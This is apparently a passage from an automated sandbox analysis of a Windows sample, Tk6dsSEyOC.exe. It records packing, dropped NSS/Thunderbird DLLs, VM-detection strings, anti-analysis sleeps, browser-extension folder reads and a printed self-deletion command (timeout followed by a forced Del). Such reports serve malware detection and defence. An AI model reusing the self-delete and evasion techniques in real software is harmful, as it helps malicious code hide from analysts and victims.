Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr, mozMapi32_InUse.dll.0.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.372483857.000000004BC51000.00000004.00000010.sdmp, AccessibleMarshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.373618716.000000004BC7F000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373284353.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373416548.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373403037.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373313194.000000004BC7E000.00000004.00000010.sdmp, breakpadinjector.dll.0.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Unpacked PE file: 0.2.Tk6dsSEyOC.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Unpacked PE file: 0.2.Tk6dsSEyOC.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00466770 push eax; ret 0_2_0046678E
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004667E0 push eax; ret 0_2_004667C5
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0046678F push eax; ret 0_2_004667C5
PE file contains sections with non-standard names
Source: sqlite3.dll.0.dr Static PE information: section name: /4
Source: sqlite3.dll.0.dr Static PE information: section name: /19
Source: sqlite3.dll.0.dr Static PE information: section name: /31
Source: sqlite3.dll.0.dr Static PE information: section name: /45
Source: sqlite3.dll.0.dr Static PE information: section name: /57
Source: sqlite3.dll.0.dr Static PE information: section name: /70
Source: sqlite3.dll.0.dr Static PE information: section name: /81
Source: sqlite3.dll.0.dr Static PE information: section name: /92
Source: AccessibleHandler.dll.0.dr Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.0.dr Static PE information: section name: .orpc
Source: IA2Marshal.dll.0.dr Static PE information: section name: .orpc
Source: lgpllibs.dll.0.dr Static PE information: section name: .rodata
Source: MapiProxy.dll.0.dr Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.0.dr Static PE information: section name: .orpc
Source: mozglue.dll.0.dr Static PE information: section name: .didat
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004333DD LoadLibraryA,GetProcAddress,FreeLibrary, 0_2_004333DD
Binary contains a suspicious time stamp
Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr Static PE information: 0x9F27750A [Wed Aug 12 16:00:10 2054 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.95634126707

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\lgpllibs.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy_InUse.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\qipcap.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleHandler.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\softokn3.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\freebl3.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssdbm3.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\libEGL.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ucrtbase.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32_InUse.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\prldap60.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nss3.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldif60.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozglue.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\vcruntime140.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssckbi.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\IA2Marshal.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldap60.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\msvcp140.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleMarshal.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\breakpadinjector.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processenvironment-l1-1-0.dll

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe"
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0041DD0B __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0041DD0B
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe TID: 6116 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 4396 Thread sleep count: 87 > 30
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\lgpllibs.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy_InUse.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\qipcap.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleHandler.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\softokn3.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\freebl3.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssdbm3.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\libEGL.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32_InUse.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\prldap60.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldif60.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssckbi.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldap60.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\IA2Marshal.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleMarshal.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\breakpadinjector.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processenvironment-l1-1-0.dll
Is looking for software installed on the system
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened / queried: C:\Program Files (x86)\Hyper-V\VMCreate.exe
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004362A1 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 0_2_004362A1
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0043DA90 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 0_2_0043DA90
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0045E752 FindFirstFileExW, 0_2_0045E752
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00434721 __EH_prolog,GetLogicalDriveStringsA, 0_2_00434721
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: Amcache.hve.0.dr Binary or memory string: VMware
Source: Amcache.hve.0.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.0.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.0.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.0.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.0.dr Binary or memory string: VMware7,1
Source: Amcache.hve.0.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.0.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Tk6dsSEyOC.exe, 00000000.00000003.294431831.0000000000562000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.305356064.0000000000562000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.316187429.0000000000562000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.0.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
